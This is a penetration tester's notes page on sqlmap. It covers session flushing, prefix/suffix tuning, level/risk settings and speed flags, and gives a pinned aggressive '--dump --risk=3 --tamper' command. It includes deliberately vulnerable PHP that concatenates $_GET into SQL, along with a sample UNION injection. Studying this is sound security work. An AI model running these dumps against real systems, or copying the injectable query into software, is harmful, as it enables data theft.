SQLMAP

SQLMap is a free and open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection (SQLi) flaws

PINNED

--dump --batch --level=5 --risk=3 --no-cast --thread=10 --random-agent --tamper=between,space2comment

BASICS

INSTALLATION

root@oco:~$ sudo apt install sqlmap
root@oco:~$ sqlmap -h
 * display basic help
root@oco:~$ sqlmap -hh
 * display advanced detailed help

FLUSHING SESSIONS

By default, when you use sqlmap on a target, it creates a session relating to the target which it keeps in memory on your machine.

So, if you give sqlmap the same query, it will be able to continue exploiting the SQLi straight away, as it will have all the necessary information already in memory (payload, database structure already found, etc.) and it will not need to start from the beginning

sqlmap --flush-session -u 94.237.49.31:39481
 * this is used if you want sqlmap to start from scratch & delete the previous session

TUNING

SPECIAL PREFIX & SUFFIX REQUIREMENTS

sqlmap -u "{targetSite:port}/?{parameter}={value}" --prefix="%'))" --suffix="-- -"
 * This will result in an enclosure of all vector values between the static prefix %')) and the suffix -- -.
 
#example vulnerable code target
 $query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) LIMIT 0,1";
 $result = mysqli_query($link, $query); 
 
#result
 SELECT id,name,surname FROM users WHERE id LIKE (('test%')) UNION ALL SELECT 1,2,VERSION()-- -')) LIMIT 0,1
 The vector UNION ALL SELECT 1,2,VERSION(), bounded with the prefix %')) and the suffix -- -, will result in the following (valid) SQL statement at the target:

EXTENDING VECTORS & BOUNDARIES

  • The option --level (1-5, default 1) extends both vectors and boundaries being used, based on their expectancy of success (i.e., the lower the expectancy, the higher the level).

  • The option --risk (1-3, default 1) extends the used vector set based on their risk of causing problems at the target side (i.e., risk of database entry loss or denial-of-service).

sqlmap -u www.example.com/?id=1 -v 3 --level=5
sqlmap -u www.example.com/?id=1 --level=5 --risk=3
   * As for the number of payloads, by default (i.e. --level=1 --risk=1), the number of payloads used for testing a single parameter goes up to 72, while in the most detailed case (--level=5 --risk=3) the number of payloads increases to 7,865.

CUSTOM COLUMN NUMBERS

this is used if we can manually find the exact number of columns of the vulnerable SQL query

sqlmap -r reqCase7.txt --dump --batch --level=5 --risk=3 --no-cast --thread=10 --random-agent --union-cols=5

SPEED

sqlmap -r reqCase5.txt --dump --batch --level=5 --risk=3 --no-cast --thread=10
 * --no-cast ensures that sqlmap sends payloads without applying type casting, which might be beneficial in cases where casting could trigger errors or affect how the injection is processed by the database
 * maximum 10
PreviousSMBCLIENTNextGET REQUESTS

Last updated